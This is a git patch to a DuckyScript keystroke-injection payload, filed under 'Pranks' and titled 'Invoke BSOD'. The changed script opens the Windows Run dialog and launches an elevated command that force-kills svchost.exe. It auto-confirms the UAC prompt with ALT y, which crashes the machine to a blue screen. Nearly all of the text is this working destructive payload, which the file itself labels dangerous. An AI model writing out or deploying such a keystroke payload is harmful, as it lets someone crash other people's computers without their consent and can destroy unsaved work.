From 890eefb58c730fdfcdb87b62cc7bb8b85c9f0289 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Wed, 29 Nov 2023 10:31:32 +0000 Subject: [PATCH] Update Invoke BSOD.txt --- Pranks/Invoke BSOD.txt | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/Pranks/Invoke BSOD.txt b/Pranks/Invoke BSOD.txt index fffb0cf..da6218c 100644 --- a/Pranks/Invoke BSOD.txt +++ b/Pranks/Invoke BSOD.txt @@ -8,14 +8,10 @@ REM ***This is a dangerous script - Be Careful!!!*** REM some setup for dukie script. DEFAULT_DELAY 100 -REM open powershell (remove -W Hidden to show the window) +DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -NonI -W Hidden -Exec Bypass +STRING cmd /c taskkill /f /im svchost.exe CTRL-SHIFT ENTER -DELAY 1500 +DELAY 2500 ALT y -DELAY 5000 - -STRING taskkill /f /im svchost.exe -ENTER